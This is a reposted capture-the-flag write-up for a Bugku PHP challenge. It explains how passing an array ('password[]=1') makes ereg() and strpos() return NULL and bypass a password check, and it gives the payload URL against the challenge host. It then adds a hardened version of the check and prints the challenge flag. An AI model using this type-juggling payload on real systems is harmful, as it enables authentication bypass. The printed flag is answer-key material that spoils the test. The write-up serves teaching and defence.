<?php
$flag = "flag";
if (isset($_GET['password'])) {
    if (ereg("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
        echo 'You password must be alphanumeric';
    else if (strpos($_GET['password'], '--') !== FALSE)
        die('Flag: ' . $flag);
    else
        echo 'Invalid password';
}
?>
ereg can be bypassed by truncation.
strpos is also truncated when it is given an array: it returns NULL.
Payload:
http://123.206.87.240:9009/19.php?password[]=1
PHP is a weakly typed language and is quite sensitive to arrays.
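The root cause is that ereg() and strpos() return NULL, not FALSE, when handed an array, so both `=== FALSE` and `!== FALSE` compare against the wrong type and the check falls through to the flag branch. The following is an added example (not the challenge's code or the original author's) showing how the same check is written defensively: the input type is verified first, and the regex result is compared against exactly the value that means "matched". ereg() is removed in PHP 7, so preg_match() is used; the `$flag` value is a placeholder.

```php
<?php
// Added example, not part of the original writeup.
// Hardened version of the challenge's password check.

function check_password($input, string $flag = 'flag{placeholder}'): string
{
    // $_GET['password'] may be an array (password[]=1). ereg()/strpos()
    // return NULL for arrays, which is neither TRUE nor FALSE, so the
    // original comparisons silently pass. Reject non-strings outright.
    if (!is_string($input)) {
        return 'Invalid password';
    }

    // \A and \z anchor the whole string; a bare "$" would still accept a
    // trailing newline. preg_match() returns 1 on match, 0 on no match and
    // false on error, so compare against 1 exactly instead of against FALSE.
    if (preg_match('/\A[a-zA-Z0-9]+\z/', $input) !== 1) {
        return 'Your password must be alphanumeric';
    }

    // For genuine string input this branch is unreachable: an alphanumeric
    // string can never contain "--". It is kept only to mirror the original
    // control flow and show that the flag is no longer reachable.
    if (strpos($input, '--') !== false) {
        return 'Flag: ' . $flag;
    }

    return 'Invalid password';
}

// Constructed inputs exercising each path (hypothetical, not from the page):
var_dump(check_password(['1']));    // "Invalid password"  (array is rejected)
var_dump(check_password("abc\n"));  // "Your password must be alphanumeric"
var_dump(check_password("abc--"));  // "Your password must be alphanumeric"
var_dump(check_password("abc123")); // "Invalid password"
```

The array case is the one the writeup exploits; the `"abc\n"` case is included because the original regex's `$` anchor would have accepted it, which is a separate weakness of the same check.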
Flag: flag{ctf-bugku-ad-2131212}
Reposted from: https://www.cnblogs.com/gaonuoqi/p/11407089.html